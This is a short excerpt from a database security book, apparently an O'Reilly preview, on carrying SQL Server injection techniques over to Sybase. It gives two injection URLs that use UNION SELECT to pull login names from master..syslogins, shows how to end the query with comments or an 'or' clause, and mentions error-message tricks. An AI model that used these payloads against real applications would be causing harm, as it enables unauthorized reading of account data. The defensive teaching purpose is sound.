MS SQL Server Injection Techniques in Sybase
A lot of papers have been published on SQL injection in Microsoft SQL Server applications, and because Sybase and MS SQL Server have a common heritage, it is worthwhile to take a quick survey of the known techniques and see how well they work in Sybase.
Comments
Sybase uses the -- and /* comment styles in exactly the same manner as MS SQL Server, so you can truncate queries in the same way using the -- sequence. It's unwise to get too hung up on -- because it's always possible to complete the query in a manner that makes the comment sequence unnecessary. For example, in the preceding UNION SELECT example,
http://sybase.example.com/servlet/BookQuery?search=1234')+union+select+name,null,null,null,null,null,null,null,null,0+from+master..syslogins--
we could just conclude the query with an unnecessary “or” term:
http://sybase.example.com/servlet/BookQuery?search=1234')+union+select+name,null,null,null,null,null,null,null,null,0+from+master..syslogins+where+1=1+or+('a'='a
This way we would make the entire query syntactically correct. In general, a superfluous “or” operator in a where clause will work, or (if you're injecting a batch of statements) an additional “select” at the end of the batch.
Union Select
As you have just seen, “union select” statements work in almost exactly the same way.
Error Messages
Sybase error messages are almost as helpful as MS SQL Server error messages. Specifically, the “integer conversion” trick works identically. ...
Get The Database Hacker's Handbook: Defending Database Servers now with the O’Reilly learning platform.
O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.
